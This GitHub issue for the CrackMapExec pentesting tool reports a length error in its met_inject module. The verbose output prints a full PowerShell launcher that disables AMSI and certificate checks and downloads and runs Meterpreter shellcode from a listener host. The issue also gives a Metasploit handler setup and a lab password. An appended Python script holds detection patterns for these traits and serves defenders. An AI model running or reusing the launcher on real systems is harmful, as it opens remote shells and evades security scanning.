byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

Using met_inject module results in length error #179

Closed ryan-wendel closed 7 years ago

ryan-wendel commented 7 years ago

Steps to reproduce

  1. Use the met_inject module in an attempt to spawn a meterpreter shell on a system

  2. Receive a length error and cme hangs.

Command string used

cme --verbose smb -d -u -p '' -M met_inject -o LHOST= LPORT= PAYLOAD=reverse_http[s]

CME verbose output (using the --verbose flag)

DEBUG Passed args: {'content': False, 'cred_id': [], 'darrell': False, 'depth': None, 'disks': False, 'domain': 'GONAD', 'exclude_dirs': '', 'exec_method': None, 'execute': None, 'fail_limit': None, 'force_ps32': False, 'gen_relay_list': None, 'gfail_limit': None, 'groups': None, 'hash': [], 'jitter': None, 'list_modules': False, 'local_auth': False, 'local_groups': None, 'loggedon_users': False, 'lsa': False, 'module': 'met_inject', 'module_options': ['LHOST=192.168.4.61', 'LPORT=8080', 'PAYLOAD=reverse_http'], 'no_output': False, 'ntds': None, 'only_files': False, 'pass_pol': False, 'password': ['ItchyBalls221'], 'pattern': None, 'port': 445, 'protocol': 'smb', 'ps_execute': None, 'regex': None, 'rid_brute': None, 'sam': False, 'server': 'https', 'server_host': '0.0.0.0', 'server_port': None, 'sessions': False, 'share': 'C$', 'shares': False, 'show_module_options': False, 'spider': None, 'spider_folder': '.', 'target': ['192.168.4.27'], 'threads': 100, 'timeout': None, 'ufail_limit': None, 'username': ['user01'], 'users': None, 'verbose': True, 'wmi': None, 'wmi_namespace': 'root\cimv2'}
DEBUG CME server type: https
SMB 192.168.4.27 445 WIN7CLIENT01 [*] Windows 7 Enterprise 7601 Service Pack 1 x64 (name:WIN7CLIENT01) (domain:GONAD) (signing:False) (SMBv1:True)
DEBUG add_credential(credtype=plaintext, domain=GONAD, username=user01, password=ItchyBalls221, groupid=None, pillagedfrom=None) => None
SMB 192.168.4.27 445 WIN7CLIENT01 [+] GONAD\user01:ItchyBalls221 (Pwn3d!)
DEBUG Generated PS IEX Launcher:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX (New-Object Net.WebClient).DownloadString('https://192.168.4.61:443/Invoke-Shellcode.ps1')
$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {[Char]$_}
$SumTest = $False
while ($SumTest -eq $False) {
    $GeneratedUri = $CharArray | Get-Random -Count 4
    $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
}
$RequestUri = -join $GeneratedUri
$Request = "http://192.168.4.61:8080/$($RequestUri)"
$WebClient = New-Object System.Net.WebClient
[Byte[]]$bytes = $WebClient.DownloadData($Request)
Invoke-Shellcode -Force -Shellcode $bytes

DEBUG Generated PS command:

[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true) }catch{}
$command = '...'
if ($Env:PROCESSOR_ARCHITECTURE -eq 'AMD64') {
    $exec = $Env:windir + '\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -exec bypass -noni -nop -w 1 -C "powershell ([char]45+[char]101+[char]99) ' + $command + '"'
    IEX $exec
} else {
    $exec = [System.Convert]::FromBase64String($command)
    $exec = [Text.Encoding]::Unicode.GetString($exec)
    IEX $exec
}

[-] Command exceeds maximum length of 8191 chars (was 8548). exiting.

OS

root@kali:~# cat /etc/issue
Kali GNU/Linux Rolling \n \l

root@kali:~# uname -a
Linux kali 4.9.0-kali4-amd64 #1 SMP Debian 4.9.25-1kali1 (2017-05-04) x86_64 GNU/Linux

Target OS

OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7601 Service Pack 1 Build 7601

Detailed issue explanation

Not much else to say. I receive the error if I use http or https.

Multi/handler used (not that it matters)

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.4.61
set LPORT 8080
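Added defender-side example, not part of the issue or of CrackMapExec: a small Python triage routine that scores a captured PowerShell command line against the traits visible in the launcher above (AMSI field tampering via reflection, disabled TLS certificate validation, the hidden/non-interactive switches, the hop into SysWOW64 PowerShell, base64-to-IEX, remote download, and a command line approaching the 8191-character limit the error message cites). The indicator names, the threshold and both sample command lines are constructed for this example.

```python
import re

# Indicator patterns drawn from the launcher in the issue's --verbose output.
# Each entry is (indicator name, regex); matching is case-insensitive.
INDICATORS = [
    ("amsi_reflection_bypass",
     re.compile(r"AmsiUtils|amsiInitFailed", re.I)),
    ("tls_validation_disabled",
     re.compile(r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("stealth_switches",
     re.compile(r"-exec\s+bypass|-noni\b|-nop\b|-w\s+1\b", re.I)),
    ("syswow64_powershell",
     re.compile(r"SysWOW64\\WindowsPowerShell", re.I)),
    ("base64_to_iex",
     re.compile(r"FromBase64String\(.*\bIEX\b", re.I | re.S)),
    ("remote_download",
     re.compile(r"Net\.WebClient.*Download(String|Data)\(", re.I | re.S)),
    ("shellcode_runner",
     re.compile(r"Invoke-Shellcode", re.I)),
]

# cmd.exe rejects command lines longer than this (the limit CME's error cites);
# anything past half of it is already far outside normal interactive use.
CMD_MAX_LEN = 8191

def score_command(cmdline):
    """Return (score, matched indicator names) for one process command line."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    if len(cmdline) > CMD_MAX_LEN // 2:
        hits.append("oversized_command_line")
    return len(hits), hits

def is_suspicious(cmdline, threshold=3):
    """Flag a command line once enough independent indicators co-occur."""
    return score_command(cmdline)[0] >= threshold

# Constructed sample command lines (not taken from real logs).
SAMPLE_BENIGN = "powershell.exe -NoProfile -Command Get-Service -Name Spooler"
SAMPLE_LAUNCHER = (
    "[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} "
    "try{ [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed', 'NonPublic,Static') }catch{} "
    "$exec = $Env:windir + '\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe "
    "-exec bypass -noni -nop -w 1 -C \"...\"'; IEX $exec"
)

if __name__ == "__main__":
    for line in (SAMPLE_BENIGN, SAMPLE_LAUNCHER):
        print(is_suspicious(line), score_command(line)[1])
```

Feed it the command-line field of process-creation or script-block events; the threshold keeps a single benign hit such as `-nop` from paging anyone.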

byt3bl33d3r commented 7 years ago

Thanks. Will fix when I get some time. Cheers